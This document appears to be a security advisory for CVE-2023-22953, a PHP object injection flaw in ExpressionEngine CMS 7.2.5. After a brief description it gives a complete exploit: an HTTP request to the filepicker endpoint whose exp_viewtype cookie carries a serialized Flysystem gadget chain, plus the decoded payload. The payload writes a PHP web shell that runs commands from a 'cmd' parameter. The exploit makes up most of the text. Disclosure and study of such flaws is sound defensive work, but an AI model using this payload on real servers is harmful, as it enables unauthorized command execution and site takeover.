-CVE ID: CVE-2023-22953
- Vulnerable version: 7.2.5
-Vulnerable software: ExpressionEngine CMS
-Link: https://expressionengine.com/
-Authors: Ahmed Sherif (@sherif_ninja) and Abood Nour (@AboodNour)
Arbitrary command execution by exploiting an object injection vulnerability. The affected endpoint is /cp/addons/settings/filepicker
and can be exploited by sending a
serialized malicious object in the exp_viewtype
cookie. The Adapter class can be used to build a gadget chain and write PHP files into the default app directory.
An authenticated user can exploit the PHP Object Injection and gain command execution on the underlying operating system.
GET /admin.php?/cp/addons/settings/filepicker HTTP/1.1
Host: localhost:30001
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Purpose: prefetch
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: exp_last_visit=1671913623; exp_last_activity=1671968630; exp_viewtype=a%3A2%3A%7Bi%3A1337%3BO%3A67%3A%22ExpressionEngine%5C%5CDependency%5C%5CLeague%5C%5CFlysystem%5C%5CCached%5C%5CStorage%5C%5CAdapter%22%3A4%3A%7Bs%3A7%3A%22adapter%22%3BO%3A58%3A%22ExpressionEngine%5C%5CDependency%5C%5CLeague%5C%5CFlysystem%5C%5CAdapter%5C%5CLocal%22%3A4%3A%7Bs%3A10%3A%22rootExists%22%3Bb%3A0%3Bs%3A13%3A%22pathSeparator%22%3Bs%3A1%3A%22%2F%22%3Bs%3A10%3A%22writeFlags%22%3Bi%3A0%3Bs%3A10%3A%22pathPrefix%22%3Bs%3A32%3A%22%2Fvar%2Fwww%2Fhtml%2Fimages%2Ftesting.php%22%3B%7Ds%3A8%3A%22autosave%22%3Bb%3A0%3Bs%3A4%3A%22file%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22expire%22%3Bs%3A34%3A%22%3C%3Fphp+echo+system%28%24_GET%5B%27cmd%27%5D%29%3B%3F%3E%22%3B%7Di%3A1337%3Bs%3A5%3A%227knbh%22%3B%7D%; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%223f92644cb590bcfc68dab723c0211297faea6108e6c788b23da23ff45100808e41675301e75d960c6ac60df9021f5acc%22%7D; exp_csrf_token=fe3239026bae4959dfe79f2701e87d181d9d4a07; exp_sessionid=2684f59ade507f3ee6f45f6eef4eeff6edd686d8
Connection: close
a:2:{i:1337;O:67:"ExpressionEngine\\Dependency\\League\\Flysystem\\Cached\\Storage\\Adapter":4:{s:7:"adapter";O:58:"ExpressionEngine\\Dependency\\League\\Flysystem\\Adapter\\Local":4:{s:10:"rootExists";b:0;s:13:"pathSeparator";s:1:"/";s:10:"writeFlags";i:0;s:10:"pathPrefix";s:29:"/var/www/html/images/file.php";}s:8:"autosave";b:0;s:4:"file";s:0:"";s:6:"expire";s:34:"<?php echo system($_GET['cmd']);?>";}i:1337;s:5:"7knbh";}